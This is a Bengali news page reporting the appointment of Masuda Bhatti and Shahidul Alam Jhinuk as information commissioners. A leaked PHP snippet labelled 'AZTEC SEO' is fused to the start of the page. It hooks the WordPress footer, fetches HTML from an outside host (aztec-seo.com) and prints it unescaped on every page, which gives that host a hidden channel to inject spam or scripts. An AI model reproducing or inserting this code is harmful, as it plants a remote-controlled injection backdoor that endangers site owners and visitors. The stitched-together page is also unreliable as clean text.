/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); তথ্য কমিশনার পদে মাসুদা ভাট্টি ও শহীদুল আলম | Dhaka Sky News

জোহানেসবার্গে শেখ হাসিনার সঙ্গে নরেন্দ্র মোদির কুশল বিনিময়

আগের সংবাদ

ব্রিকসকে হতে হবে বিশ্বের বাতিঘর: প্রধানমন্ত্রী

পরের সংবাদ

তথ্য কমিশনার পদে মাসুদা ভাট্টি ও শহীদুল আলম

সাংবাদিক মাসুদা ভাট্টি এবং অবসরপ্রাপ্ত মহা-পরিদর্শক, নিবন্ধন (সিনিয়র জেলা ও দায়রা জজ) শহীদুল আলম ঝিনুক নতুন দুই তথ্য কমিশনার হিসাবে নিযুক্ত হয়েছেন। তথ্য অধিকার আইন, ২০০৯-এর ১৫(১) ধারা অনুযায়ী রাষ্ট্রপতি এ নিয়োগ দিয়েছেন।

বৃহস্পতিবার তথ্য ও সম্প্রচার মন্ত্রণালয় থেকে এ মর্মে প্রজ্ঞাপনে বলা হয়েছে, জনস্বার্থে জারি এ আদেশ অবিলম্বে কার্যকর হবে।

সাংবাদিক মাসুদা ভাট্টি সাবেক তথ্য কমিশনার সুরাইয়া বেগমের স্থলাভিষিক্ত হলেন। পূর্বতন তথ্য কমিশনার ড. আবদুল মালেক ২১ মার্চ ২০২৩ প্রধান তথ্য কমিশনার হিসাবে নিযুক্ত হওয়ায় তথ্য কমিশনারের শূন্য পদে নিযুক্ত হয়েছেন শহীদুল আলম ঝিনুক।

বিধি অনুযায়ী তথ্য কমিশনার পদে নিযুক্তির মেয়াদ পাঁচ বছর অথবা নিযুক্তের বয়স ৬৭টি বছর পূর্ণ হওয়ার মধ্যে যেটি আগে হয়।

নতুন তথ্য কমিশনার শহীদুল আলম ঝিনুক দশম বিসিএস কর্মকর্তা হিসাবে ১৯৯১ সালে বিচার বিভাগে যোগ দেন এবং সিনিয়র জেলা ও দায়রা জজ হিসাবে মহা-পরিদর্শক, নিবন্ধন পদ থেকে চলতি বছরের জানুয়ারিতে অবসরোত্তর ছুটিতে যান।

আর বিবিসি ও মস্কো টাইমসে সাংবাদিকতা করে আসা রাজনৈতিক বিশ্লেষক ও গ্রন্থকার মাসুদা ভাট্টি দৈনিক আমাদের অর্থনীতি পত্রিকার নির্বাহী সম্পাদকের দায়িত্ব পালন করছিলেন।